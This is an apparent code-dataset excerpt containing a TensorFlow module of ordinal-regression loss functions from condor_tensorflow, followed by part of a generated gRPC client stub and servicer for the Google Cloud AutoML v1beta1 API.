| 48.895433 | 118 | 0.684496 | 5,325 | 40,681 | 5.054836 | 0.059718 | 0.022402 | 0.033288 | 0.014117 | 0.851841 | 0.829662 | 0.813835 | 0.799755 | 0.785786 | 0.776312 | 0 | 0.009381 | 0.234827 | 40,681 | 831 | 119 | 48.954272 | 0.855339 | 0.437698 | 0 | 0.635443 | 0 | 0 | 0.1208 | 0.009222 | 0 | 0 | 0 | 0.001203 | 0 | 1 | 0.116456 | false | 0.073418 | 0.037975 | 0.010127 | 0.301266 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
7696fc5c075bea5f42c57d5f76016523e4497981 | 16,498 | py | Python | src/condor_tensorflow/loss.py | GarrettJenkinson/condor_tensorflow | db715a2db6a5c0dbf610f5ad82cec16e2ab3d3d8 | [
"Apache-2.0"
] | 9 | 2021-10-31T16:39:35.000Z | 2022-02-19T17:51:07.000Z | src/condor_tensorflow/loss.py | GarrettJenkinson/condor_tensorflow | db715a2db6a5c0dbf610f5ad82cec16e2ab3d3d8 | [
"Apache-2.0"
] | 4 | 2022-01-01T19:52:55.000Z | 2022-02-16T00:38:40.000Z | src/condor_tensorflow/loss.py | GarrettJenkinson/condor_tensorflow | db715a2db6a5c0dbf610f5ad82cec16e2ab3d3d8 | [
"Apache-2.0"
] | 4 | 2021-10-31T17:50:29.000Z | 2022-02-11T02:54:47.000Z | from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
import tensorflow as tf
from .activations import ordinal_softmax
# The outer function is a constructor to create a loss function using a
# certain number of classes.
class CondorNegLogLikelihood(tf.keras.losses.Loss):
def __init__(self,
from_type="ordinal_logits",
name="ordinal_nll",
**kwargs):
""" Negative log likelihood loss designed for ordinal outcomes.
Parameters
----------
from_type: one of "ordinal_logits" (default), or "probs".
Ordinal logits are the output of a Dense(num_classes-1) layer with no activation.
(Not yet implemented) Probs are the probability outputs of a softmax or ordinal_softmax layer.
Returns
----------
loss: tf.Tensor, shape=(num_samples,)
Loss vector, note that tensorflow will reduce it to a single number
automatically.
"""
self.from_type = from_type
super().__init__(name=name, **kwargs)
# Modified from: https://github.com/tensorflow/tensorflow/blob/6dcd6fcea73ad613e78039bd1f696c35e63abb32/tensorflow/python/ops/nn_impl.py#L112-L148
def ordinal_loss(self, logits, labels, name=None):
""" Negative log likelihood loss function designed for ordinal outcomes.
Parameters
----------
logits: tf.Tensor, shape=(num_samples,num_classes-1)
Logit output of the final Dense(num_classes-1) layer.
levels: tf.Tensor, shape=(num_samples, num_classes-1)
Encoded labels provided by CondorOrdinalEncoder.
Returns
----------
loss: tf.Tensor, shape=(num_samples,)
Loss vector, note that tensorflow will reduce it to a single number
automatically.
"""
with ops.name_scope(name, "logistic_loss", [logits, labels]) as name:
if isinstance(logits,tf.Tensor):
logits = tf.cast(logits,dtype=tf.float32,name="logits")
else:
logits = ops.convert_to_tensor(logits, dtype=tf.float32,name="logits")
if isinstance(labels,tf.Tensor):
labs = tf.cast(labels,dtype=tf.float32,name="labs")
piLab = tf.concat([tf.ones((tf.shape(labs)[0],1)),labs[:,:-1]],
axis=1,name="piLab")
else:
labs = ops.convert_to_tensor(labels, dtype=tf.float32,name="labs")
piLab = tf.concat([tf.ones((tf.shape(labs)[0],1)),labs[:,:-1]],
axis=1,name="piLab")
# The logistic loss formula from above is
# x - x * z + log(1 + exp(-x))
# For x < 0, a more numerically stable formula is
# -x * z + log(1 + exp(x))
# Note that these two expressions can be combined into the following:
# max(x, 0) - x * z + log(1 + exp(-abs(x)))
# To allow computing gradients at zero, we define custom versions of max and
# abs functions.
zeros = array_ops.zeros_like(logits, dtype=logits.dtype)
cond = (logits >= zeros)
cond2 = (piLab > zeros)
relu_logits = array_ops.where(cond, logits, zeros)
neg_abs_logits = array_ops.where(cond, -logits, logits)
temp = math_ops.add(relu_logits - logits * labs,
math_ops.log1p(math_ops.exp(neg_abs_logits)))
return tf.math.reduce_sum(array_ops.where(cond2, temp, zeros),
axis=1,name=name)
# Following https://www.tensorflow.org/api_docs/python/tf/keras/losses/Loss
def call(self, y_true, y_pred):
# Ensure that y_true is the same type as y_pred (presumably a float).
y_pred = tf.convert_to_tensor(y_pred)
y_true = tf.cast(y_true, y_pred.dtype)
# get number of classes
num_classes = tf.shape(y_pred)[1]+1
# we are not sparse here, so labels are encoded already
tf_levels = y_true
if self.from_type == "ordinal_logits":
return self.ordinal_loss(y_pred, tf_levels)
elif self.from_type == "probs":
raise Exception("not yet implemented")
elif self.from_type == "logits":
raise Exception("not yet implemented")
else:
raise Exception("Unknown from_type value " + self.from_type +
" in CondorNegLogLikelihood()")
def get_config(self):
base_config = super().get_config()
config = {
"from_type": self.from_type,
}
return {**base_config, **config}
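The comment block inside `ordinal_loss` states the identity used for numerical stability: for a logit x and target z, x - x*z + log(1 + exp(-x)) equals max(x, 0) - x*z + log(1 + exp(-|x|)). A quick numeric check of that identity in pure Python (no TensorFlow needed):

```python
import math

def naive(x, z):
    # Direct form: overflows in exp() for large negative x.
    return x - x * z + math.log(1.0 + math.exp(-x))

def stable(x, z):
    # max(x, 0) - x*z + log1p(exp(-|x|)): exp() argument is always <= 0.
    return max(x, 0.0) - x * z + math.log1p(math.exp(-abs(x)))

for x in (-3.0, -0.5, 0.0, 0.5, 3.0):
    for z in (0.0, 1.0):
        assert math.isclose(naive(x, z), stable(x, z), rel_tol=1e-12)

print(stable(-1000.0, 0.0))  # naive(-1000.0, 0.0) would overflow; stable form returns 0.0
```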
# The outer function is a constructor to create a loss function using a
# certain number of classes.
class SparseCondorNegLogLikelihood(CondorNegLogLikelihood):
def __init__(self,
from_type="ordinal_logits",
name="ordinal_negLogLikeloss",
**kwargs):
""" Negative log likelihood loss designed for ordinal outcomes.
Parameters
----------
from_type: one of "ordinal_logits" (default), or "probs".
Ordinal logits are the output of a Dense(num_classes-1) layer with no activation.
(Not yet implemented) Probs are the probability outputs of a softmax or ordinal_softmax layer.
Returns
----------
loss: tf.Tensor, shape=(num_samples,)
Loss vector, note that tensorflow will reduce it to a single number
automatically.
"""
super().__init__(name=name,
from_type=from_type,
**kwargs)
def label_to_levels(self, label):
# Original code that we are trying to replicate:
# levels = [1] * label + [0] * (self.num_classes - 1 - label)
label_vec = tf.repeat(1, tf.cast(tf.squeeze(label), tf.int32))
# This line requires that label values begin at 0. If they start at a higher
# value it will yield an error.
num_zeros = self.num_classes - 1 - tf.cast(tf.squeeze(label), tf.int32)
zero_vec = tf.zeros(shape=(num_zeros), dtype=tf.int32)
levels = tf.concat([label_vec, zero_vec], axis=0)
return tf.cast(levels, tf.float32)
# Following https://www.tensorflow.org/api_docs/python/tf/keras/losses/Loss
def call(self, y_true, y_pred):
# Ensure that y_true is the same type as y_pred (presumably a float).
y_pred = tf.convert_to_tensor(y_pred)
y_true = tf.cast(y_true, y_pred.dtype)
# get number of classes
self.num_classes = tf.shape(y_pred)[1]+1
# Convert each true label to a vector of ordinal level indicators.
tf_levels = tf.map_fn(self.label_to_levels, y_true)
if self.from_type == "ordinal_logits":
return self.ordinal_loss(y_pred, tf_levels)
elif self.from_type == "probs":
raise Exception("not yet implemented")
elif self.from_type == "logits":
raise Exception("not yet implemented")
else:
raise Exception("Unknown from_type value " + self.from_type +
" in SparseCondorNegLogLikelihood()")
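`label_to_levels` turns a sparse class index into the ordinal indicator vector consumed by `ordinal_loss` — the `[1] * label + [0] * (num_classes - 1 - label)` encoding mentioned in its comment. A pure-Python version for intuition, without TensorFlow:

```python
def label_to_levels(label: int, num_classes: int) -> list:
    # Class k becomes k ones followed by (num_classes - 1 - k) zeros.
    return [1.0] * label + [0.0] * (num_classes - 1 - label)

print(label_to_levels(0, 5))  # → [0.0, 0.0, 0.0, 0.0]
print(label_to_levels(2, 5))  # → [1.0, 1.0, 0.0, 0.0]
print(label_to_levels(4, 5))  # → [1.0, 1.0, 1.0, 1.0]
```

As the code comment warns, labels must start at 0: a label of `num_classes` or more would produce a negative repeat count for the zero tail.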
class CondorOrdinalCrossEntropy(tf.keras.losses.Loss):
def __init__(self,
importance_weights=None,
from_type="ordinal_logits",
name="ordinal_crossent",
**kwargs):
""" Cross-entropy loss designed for ordinal outcomes.
Parameters
----------
importance_weights: tf or np array of floats, shape(numclasses-1,)
(Optional) importance weights for each binary classification task.
from_type: one of "ordinal_logits" (default), or "probs".
Ordinal logits are the output of a Dense(num_classes-1) layer with no activation.
(Not yet implemented) Probs are the probability outputs of a softmax or ordinal_softmax layer.
Returns
----------
loss: tf.Tensor, shape=(num_samples,)
Loss vector, note that tensorflow will reduce it to a single number
automatically.
"""
self.importance_weights = importance_weights
self.from_type = from_type
super().__init__(name=name, **kwargs)
def ordinal_loss(self, logits, levels, importance):
""" Cross-entropy loss function designed for ordinal outcomes.
Parameters
----------
logits: tf.Tensor, shape=(num_samples,num_classes-1)
Logit output of the final Dense(num_classes-1) layer.
levels: tf.Tensor, shape=(num_samples, num_classes-1)
Encoded labels provided by CondorOrdinalEncoder.
importance_weights: tf or np array of floats, shape(numclasses-1,)
Importance weights for each binary classification task.
Returns
----------
loss: tf.Tensor, shape=(num_samples,)
Loss vector, note that tensorflow will reduce it to a single number
automatically.
"""
logprobs = tf.math.cumsum(tf.math.log_sigmoid(logits), axis=1)
eps = tf.keras.backend.epsilon()
val = (-tf.reduce_sum(importance * (logprobs * levels + \
(tf.math.log(1 - tf.math.exp(logprobs) + eps) * (1 - levels))), axis=1))
return val
# Following https://www.tensorflow.org/api_docs/python/tf/keras/losses/Loss
def call(self, y_true, y_pred):
# Ensure that y_true is the same type as y_pred (presumably a float).
y_pred = tf.convert_to_tensor(y_pred)
y_true = tf.cast(y_true, y_pred.dtype)
# get number of classes
num_classes = tf.shape(y_pred)[1]+1
# we are not sparse here, so labels are encoded already
tf_levels = y_true
if self.importance_weights is None:
importance_weights = tf.ones(num_classes-1,
dtype=tf.float32)
else:
importance_weights = tf.cast(
self.importance_weights, dtype=tf.float32)
if self.from_type == "ordinal_logits":
return self.ordinal_loss(y_pred, tf_levels, importance_weights)
elif self.from_type == "probs":
raise Exception("not yet implemented")
elif self.from_type == "logits":
raise Exception("not yet implemented")
else:
raise Exception("Unknown from_type value " + self.from_type +
" in CondorOrdinalCrossEntropy()")
def get_config(self):
base_config = super().get_config()
config = {
"importance_weights": self.importance_weights,
"from_type": self.from_type,
}
return {**base_config, **config}
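`ordinal_loss` above computes cumulative log-probabilities logprobs[k] = log P(y > k) as a running sum of log-sigmoids of the logits, then scores each binary task against the level indicators. A scalar pure-Python sketch of the same computation for a single sample, assuming uniform importance weights (this is an illustration, not the library's TensorFlow implementation):

```python
import math

def log_sigmoid(x):
    # Numerically stable log(sigmoid(x)) = min(x, 0) - log1p(exp(-|x|))
    return min(x, 0.0) - math.log1p(math.exp(-abs(x)))

def ordinal_crossentropy(logits, levels, eps=1e-7):
    # Running sum of log-sigmoids: logprobs[k] = log P(y > k)
    logprobs, total = [], 0.0
    for x in logits:
        total += log_sigmoid(x)
        logprobs.append(total)
    # Binary cross-entropy of each cumulative probability against its level indicator.
    loss = 0.0
    for lp, level in zip(logprobs, levels):
        loss -= lp * level + math.log(1.0 - math.exp(lp) + eps) * (1.0 - level)
    return loss

print(round(ordinal_crossentropy([2.0, -1.0, -2.0], [1.0, 0.0, 0.0]), 4))
```

A confident, correct prediction (large positive logits where the level is 1, large negative elsewhere) drives the loss toward zero.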
# The outer function is a constructor to create a loss function using a
# certain number of classes.
class SparseCondorOrdinalCrossEntropy(CondorOrdinalCrossEntropy):
def __init__(self,
importance_weights=None,
from_type="ordinal_logits",
name="ordinal_crossent",
**kwargs):
""" Cross-entropy loss designed for ordinal outcomes.
Parameters
----------
importance_weights: tf or np array of floats, shape(numclasses-1,)
(Optional) importance weights for each binary classification task.
from_type: one of "ordinal_logits" (default), or "probs".
Ordinal logits are the output of a Dense(num_classes-1) layer with no activation.
(Not yet implemented) Probs are the probability outputs of a softmax or ordinal_softmax layer.
Returns
----------
loss: tf.Tensor, shape=(num_samples,)
Loss vector, note that tensorflow will reduce it to a single number
automatically.
"""
super().__init__(name=name,
importance_weights=importance_weights,
from_type=from_type,
**kwargs)
def label_to_levels(self, label):
# Original code that we are trying to replicate:
# levels = [1] * label + [0] * (self.num_classes - 1 - label)
label_vec = tf.repeat(1, tf.cast(tf.squeeze(label), tf.int32))
# This line requires that label values begin at 0. If they start at a higher
# value it will yield an error.
num_zeros = self.num_classes - 1 - tf.cast(tf.squeeze(label), tf.int32)
zero_vec = tf.zeros(shape=(num_zeros), dtype=tf.int32)
levels = tf.concat([label_vec, zero_vec], axis=0)
return tf.cast(levels, tf.float32)
# Following https://www.tensorflow.org/api_docs/python/tf/keras/losses/Loss
def call(self, y_true, y_pred):
# Ensure that y_true is the same type as y_pred (presumably a float).
y_pred = tf.convert_to_tensor(y_pred)
y_true = tf.cast(y_true, y_pred.dtype)
# get number of classes
self.num_classes = tf.shape(y_pred)[1]+1
# Convert each true label to a vector of ordinal level indicators.
tf_levels = tf.map_fn(self.label_to_levels, y_true)
if self.importance_weights is None:
importance_weights = tf.ones(
self.num_classes - 1, dtype=tf.float32)
else:
importance_weights = tf.cast(
self.importance_weights, dtype=tf.float32)
if self.from_type == "ordinal_logits":
return self.ordinal_loss(y_pred, tf_levels, importance_weights)
elif self.from_type == "probs":
raise Exception("not yet implemented")
elif self.from_type == "logits":
raise Exception("not yet implemented")
else:
raise Exception("Unknown from_type value " + self.from_type +
" in SparseCondorOrdinalCrossEntropy()")
class OrdinalEarthMoversDistance(tf.keras.losses.Loss):
"""Computes earth mover's distance for ordinal labels."""
def __init__(self, name="earth_movers_distance",
**kwargs):
"""Creates a `OrdinalEarthMoversDistance` instance."""
super().__init__(name=name, **kwargs)
def call(self, y_true, y_pred):
"""Computes earth mover's distance for ordinal labels.
Args:
y_true: CondorOrdinal encoded labels.
y_pred: Cumulative logits from the CondorOrdinal layer.
"""
# Ensure that y_true is the same type as y_pred (presumably a float).
y_pred = tf.convert_to_tensor(y_pred)
# basic setup
cum_probs = ordinal_softmax(y_pred)
num_classes = tf.shape(cum_probs)[1]
y_true = tf.cast(tf.reduce_sum(y_true, axis=1), y_pred.dtype)
# remove all dimensions of size 1 (e.g., from [[1], [2]], to [1, 2])
#y_true = tf.squeeze(y_true)
y_dist = tf.map_fn(
fn=lambda y: tf.abs(
y - tf.range(num_classes,dtype=y_pred.dtype)),
elems=y_true)
vals = tf.reduce_sum(tf.math.multiply(y_dist,cum_probs),axis=1)
return vals
def get_config(self):
"""Returns the serializable config of the metric."""
base_config = super().get_config()
return {**base_config}
class SparseOrdinalEarthMoversDistance(OrdinalEarthMoversDistance):
"""Computes earth mover's distance for ordinal labels."""
def __init__(self, **kwargs):
"""Creates a `SparseOrdinalEarthMoversDistance` instance."""
super().__init__(**kwargs)
def call(self, y_true, y_pred):
"""Computes earth mover's distance for ordinal labels.
Args:
y_true: Sparse labels with values in {0,1,...,num_classes-1}.
y_pred: Cumulative logits from the CondorOrdinal layer.
"""
# basic set up
cum_probs = ordinal_softmax(y_pred)
num_classes = tf.shape(cum_probs)[1]
y_true = tf.cast(y_true, y_pred.dtype)
# remove all dimensions of size 1 (e.g., from [[1], [2]], to [1, 2])
#y_true = tf.squeeze(y_true)
# each row has distance to true label
y_dist = tf.map_fn(
fn=lambda y: tf.abs(y - tf.range(num_classes,
dtype=y_pred.dtype)),
elems=y_true)
# pointwise multiplication by the class probabilities, row-wise sums
vals = tf.reduce_sum(tf.math.multiply(y_dist,cum_probs),axis=1)
return vals
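For intuition, the per-example value computed by both classes is an expected absolute distance between the true class index and every class index, weighted by the predicted class probabilities. A minimal NumPy sketch of that step (assuming `ordinal_softmax` has already turned the logits into class probabilities; this helper is illustrative, not part of the library):

```python
import numpy as np

def earth_movers_distance(y_true, class_probs):
    """Expected |true index - class index| under the predicted distribution.

    y_true: integer class indices, shape (batch,).
    class_probs: class probabilities, shape (batch, num_classes).
    """
    num_classes = class_probs.shape[1]
    # dist[k, j] = |y_true[k] - j| for every class index j.
    dist = np.abs(y_true[:, None] - np.arange(num_classes))
    # Pointwise multiply by the probabilities, then sum each row.
    return (dist * class_probs).sum(axis=1)
```

A perfectly confident, correct prediction scores 0; spreading mass onto neighboring classes costs proportionally to how far the mass moves.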
| 38.818824 | 149 | 0.608013 | 2,073 | 16,498 | 4.671008 | 0.128799 | 0.021171 | 0.027264 | 0.01136 | 0.80378 | 0.795724 | 0.772798 | 0.764329 | 0.764329 | 0.754931 | 0 | 0.011623 | 0.290763 | 16,498 | 424 | 150 | 38.910377 | 0.815913 | 0.378349 | 0 | 0.708333 | 0 | 0 | 0.073163 | 0.015942 | 0 | 0 | 0 | 0 | 0 | 1 | 0.098958 | false | 0 | 0.114583 | 0 | 0.3125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
769ee7feaa824ee0b114159180d9f9523bf928f6 | 16,391 | py | Python | automl/google/cloud/automl_v1beta1/proto/service_pb2_grpc.py | deryrahman/google-cloud-python | b55058c4b2328fde32f29bfd8ea04708fcc578e0 | [
"Apache-2.0"
] | 1 | 2020-10-25T04:39:41.000Z | 2020-10-25T04:39:41.000Z | automl/google/cloud/automl_v1beta1/proto/service_pb2_grpc.py | deryrahman/google-cloud-python | b55058c4b2328fde32f29bfd8ea04708fcc578e0 | [
"Apache-2.0"
] | 4 | 2018-11-13T22:15:36.000Z | 2018-12-07T18:31:38.000Z | automl/google/cloud/automl_v1beta1/proto/service_pb2_grpc.py | deryrahman/google-cloud-python | b55058c4b2328fde32f29bfd8ea04708fcc578e0 | [
"Apache-2.0"
] | 1 | 2021-06-30T11:44:03.000Z | 2021-06-30T11:44:03.000Z | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from google.cloud.automl_v1beta1.proto import dataset_pb2 as google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_dataset__pb2
from google.cloud.automl_v1beta1.proto import model_evaluation_pb2 as google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_model__evaluation__pb2
from google.cloud.automl_v1beta1.proto import model_pb2 as google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_model__pb2
from google.cloud.automl_v1beta1.proto import service_pb2 as google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2
from google.longrunning import operations_pb2 as google_dot_longrunning_dot_operations__pb2
class AutoMlStub(object):
    """AutoML Server API.

    The resource names are assigned by the server.
    The server never reuses names that it has created after the resources with
    those names are deleted.

    An ID of a resource is the last element of the item's resource name. For
    `projects/{project_id}/locations/{location_id}/datasets/{dataset_id}`, then
    the id for the item is `{dataset_id}`.
    """

    def __init__(self, channel):
        """Constructor.

        Args:
            channel: A grpc.Channel.
        """
        self.CreateDataset = channel.unary_unary(
            '/google.cloud.automl.v1beta1.AutoMl/CreateDataset',
            request_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.CreateDatasetRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_dataset__pb2.Dataset.FromString,
        )
        self.GetDataset = channel.unary_unary(
            '/google.cloud.automl.v1beta1.AutoMl/GetDataset',
            request_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.GetDatasetRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_dataset__pb2.Dataset.FromString,
        )
        self.ListDatasets = channel.unary_unary(
            '/google.cloud.automl.v1beta1.AutoMl/ListDatasets',
            request_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.ListDatasetsRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.ListDatasetsResponse.FromString,
        )
        self.DeleteDataset = channel.unary_unary(
            '/google.cloud.automl.v1beta1.AutoMl/DeleteDataset',
            request_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.DeleteDatasetRequest.SerializeToString,
            response_deserializer=google_dot_longrunning_dot_operations__pb2.Operation.FromString,
        )
        self.ImportData = channel.unary_unary(
            '/google.cloud.automl.v1beta1.AutoMl/ImportData',
            request_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.ImportDataRequest.SerializeToString,
            response_deserializer=google_dot_longrunning_dot_operations__pb2.Operation.FromString,
        )
        self.ExportData = channel.unary_unary(
            '/google.cloud.automl.v1beta1.AutoMl/ExportData',
            request_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.ExportDataRequest.SerializeToString,
            response_deserializer=google_dot_longrunning_dot_operations__pb2.Operation.FromString,
        )
        self.CreateModel = channel.unary_unary(
            '/google.cloud.automl.v1beta1.AutoMl/CreateModel',
            request_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.CreateModelRequest.SerializeToString,
            response_deserializer=google_dot_longrunning_dot_operations__pb2.Operation.FromString,
        )
        self.GetModel = channel.unary_unary(
            '/google.cloud.automl.v1beta1.AutoMl/GetModel',
            request_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.GetModelRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_model__pb2.Model.FromString,
        )
        self.ListModels = channel.unary_unary(
            '/google.cloud.automl.v1beta1.AutoMl/ListModels',
            request_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.ListModelsRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.ListModelsResponse.FromString,
        )
        self.DeleteModel = channel.unary_unary(
            '/google.cloud.automl.v1beta1.AutoMl/DeleteModel',
            request_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.DeleteModelRequest.SerializeToString,
            response_deserializer=google_dot_longrunning_dot_operations__pb2.Operation.FromString,
        )
        self.DeployModel = channel.unary_unary(
            '/google.cloud.automl.v1beta1.AutoMl/DeployModel',
            request_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.DeployModelRequest.SerializeToString,
            response_deserializer=google_dot_longrunning_dot_operations__pb2.Operation.FromString,
        )
        self.UndeployModel = channel.unary_unary(
            '/google.cloud.automl.v1beta1.AutoMl/UndeployModel',
            request_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.UndeployModelRequest.SerializeToString,
            response_deserializer=google_dot_longrunning_dot_operations__pb2.Operation.FromString,
        )
        self.GetModelEvaluation = channel.unary_unary(
            '/google.cloud.automl.v1beta1.AutoMl/GetModelEvaluation',
            request_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.GetModelEvaluationRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_model__evaluation__pb2.ModelEvaluation.FromString,
        )
        self.ListModelEvaluations = channel.unary_unary(
            '/google.cloud.automl.v1beta1.AutoMl/ListModelEvaluations',
            request_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.ListModelEvaluationsRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.ListModelEvaluationsResponse.FromString,
        )


class AutoMlServicer(object):
    """AutoML Server API.

    The resource names are assigned by the server.
    The server never reuses names that it has created after the resources with
    those names are deleted.

    An ID of a resource is the last element of the item's resource name. For
    `projects/{project_id}/locations/{location_id}/datasets/{dataset_id}`, then
    the id for the item is `{dataset_id}`.
    """

    def CreateDataset(self, request, context):
        """Creates a dataset."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def GetDataset(self, request, context):
        """Gets a dataset."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def ListDatasets(self, request, context):
        """Lists datasets in a project."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def DeleteDataset(self, request, context):
        """Deletes a dataset and all of its contents.
        Returns empty response in the
        [response][google.longrunning.Operation.response] field when it completes,
        and `delete_details` in the
        [metadata][google.longrunning.Operation.metadata] field.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def ImportData(self, request, context):
        """Imports data into a dataset.
        Returns an empty response in the
        [response][google.longrunning.Operation.response] field when it completes.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def ExportData(self, request, context):
        """Exports dataset's data to a Google Cloud Storage bucket.
        Returns an empty response in the
        [response][google.longrunning.Operation.response] field when it completes.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def CreateModel(self, request, context):
        """Creates a model.
        Returns a Model in the [response][google.longrunning.Operation.response]
        field when it completes.
        When you create a model, several model evaluations are created for it:
        a global evaluation, and one evaluation for each annotation spec.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def GetModel(self, request, context):
        """Gets a model."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def ListModels(self, request, context):
        """Lists models."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def DeleteModel(self, request, context):
        """Deletes a model.
        If a model is already deployed, this only deletes the model in AutoML BE,
        and does not change the status of the deployed model in the production
        environment.
        Returns `google.protobuf.Empty` in the
        [response][google.longrunning.Operation.response] field when it completes,
        and `delete_details` in the
        [metadata][google.longrunning.Operation.metadata] field.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def DeployModel(self, request, context):
        """Deploys model.
        Returns a [DeployModelResponse][] in the
        [response][google.longrunning.Operation.response] field when it completes.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def UndeployModel(self, request, context):
        """Undeploys model.
        Returns an `UndeployModelResponse` in the
        [response][google.longrunning.Operation.response] field when it completes.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def GetModelEvaluation(self, request, context):
        """Gets a model evaluation."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def ListModelEvaluations(self, request, context):
        """Lists model evaluations."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')


def add_AutoMlServicer_to_server(servicer, server):
    rpc_method_handlers = {
        'CreateDataset': grpc.unary_unary_rpc_method_handler(
            servicer.CreateDataset,
            request_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.CreateDatasetRequest.FromString,
            response_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_dataset__pb2.Dataset.SerializeToString,
        ),
        'GetDataset': grpc.unary_unary_rpc_method_handler(
            servicer.GetDataset,
            request_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.GetDatasetRequest.FromString,
            response_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_dataset__pb2.Dataset.SerializeToString,
        ),
        'ListDatasets': grpc.unary_unary_rpc_method_handler(
            servicer.ListDatasets,
            request_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.ListDatasetsRequest.FromString,
            response_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.ListDatasetsResponse.SerializeToString,
        ),
        'DeleteDataset': grpc.unary_unary_rpc_method_handler(
            servicer.DeleteDataset,
            request_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.DeleteDatasetRequest.FromString,
            response_serializer=google_dot_longrunning_dot_operations__pb2.Operation.SerializeToString,
        ),
        'ImportData': grpc.unary_unary_rpc_method_handler(
            servicer.ImportData,
            request_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.ImportDataRequest.FromString,
            response_serializer=google_dot_longrunning_dot_operations__pb2.Operation.SerializeToString,
        ),
        'ExportData': grpc.unary_unary_rpc_method_handler(
            servicer.ExportData,
            request_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.ExportDataRequest.FromString,
            response_serializer=google_dot_longrunning_dot_operations__pb2.Operation.SerializeToString,
        ),
        'CreateModel': grpc.unary_unary_rpc_method_handler(
            servicer.CreateModel,
            request_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.CreateModelRequest.FromString,
